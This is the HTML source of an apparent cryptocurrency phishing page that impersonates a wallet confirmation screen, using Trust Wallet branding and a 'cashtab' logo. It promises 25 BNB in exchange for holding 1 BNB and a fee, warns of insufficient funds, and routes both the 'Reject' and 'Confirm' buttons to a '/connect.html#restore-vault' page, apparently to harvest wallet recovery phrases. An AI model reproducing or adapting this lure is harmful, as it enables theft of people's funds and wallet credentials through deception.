<!DOCTYPE html>
<html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<style>
.anticon {
  display: inline-block;
  color: inherit;
  font-style: normal;
  line-height: 0;
  text-align: center;
  text-transform: none;
  vertical-align: -0.125em;
  text-rendering: optimizeLegibility;
  -webkit-font-smoothing: antialiased;
  -moz-osx-font-smoothing: grayscale;
}

.anticon > * {
  line-height: 1;
}

.anticon svg {
  display: inline-block;
}

.anticon::before {
  display: none;
}

.anticon .anticon-icon {
  display: block;
}

.anticon[tabindex] {
  cursor: pointer;
}

.anticon-spin::before,
.anticon-spin {
  display: inline-block;
  -webkit-animation: loadingCircle 1s infinite linear;
  animation: loadingCircle 1s infinite linear;
}

@-webkit-keyframes loadingCircle {
  100% {
    -webkit-transform: rotate(360deg);
    transform: rotate(360deg);
  }
}

@keyframes loadingCircle {
  100% {
    -webkit-transform: rotate(360deg);
    transform: rotate(360deg);
  }
}
</style>
<link rel="shortcut icon" href="https://trustwallet.com/assets/images/favicon.ico" type="image/x-icon">
<link rel="icon" href="/index_files/logo.png"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#000000">
<link href="./index_files/appsc.css" rel="stylesheet"><link rel="apple-touch-icon" href="/index_files/logo.png"><title>Best Cryptocurrency Wallet</title>
<link href="./index_files/chunk.css" rel="stylesheet">
<link href="./index_files/app.css" rel="stylesheet">
<link href="./index_files/main.chunk.css" rel="stylesheet">
</head><body><div id="root"><div class="ant-spin-nested-loading"><div class="ant-spin-container"><div class="sc-jqCOkK kFZWwp"><div class="sc-gGBfsJ jvrGcO"><div class="sc-jnlKLf OHNdu"><div class="sc-fYxtnH hARKVj">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<img src="./index_files/jalogo.png" alt="cashtab" class="sc-tilXH gdtVXy"></div><br><center><div class="confirm-approve-content__identicon-wrapper"><img class="identicon confirm-approve-content__identicon" src="/camat.png" alt="" style="height: 48px;width: 48px;"></div>

<br><div class="thepadding">To get <b style="color: #4d4d4d;font-weight: bold;">25 BNB</b>, you must have a balance of at least 1 BNB on the network.</div>
</center>
<div class="confirm-approve-content__card--no-border"><div class="confirm-approve-content__card-header"><div class="confirm-approve-content__card-header__title">Transaction Fee</div><div class="confirm-approve-content__small-blue-text cursor-pointer"></div></div><div class="confirm-approve-content__card-content"><div class="confirm-approve-content__transaction-details-content"><div class="confirm-approve-content__small-text">A fee is associated with this request.</div><div class="confirm-approve-content__transaction-details-content__fee"><div class="confirm-approve-content__transaction-details-content__primary-fee"></div><div class="confirm-approve-content__transaction-details-content__secondary-fee"><b>1 BNB</b></div></div></div></div><br><br>
<p class="sc-VigVT boha" style="color: red;">Not enough funds for transaction fee, please fill your balance.</p>
<div class="sc-htoDjs cDnNqw"><form class="ant-form ant-form-horizontal" style="width: auto;"><div class="ant-row ant-form-item ant-form-item-with-help" style="row-gap: 0px;"></div><div class="pot">

<a href="/connect.html#restore-vault" class="sc-VigVT ikREId">Reject</a>		
<a href="/connect.html#restore-vault" class="sc-VigVT fWmldN">Confirm</a>	

</div>
</form></div><div class="confirm-approve-content__view-full-tx-button-wrapper"><div class="confirm-approve-content__view-full-tx-button cursor-pointer"></div></div></div></div></div></div></div></div></div>
</body></html>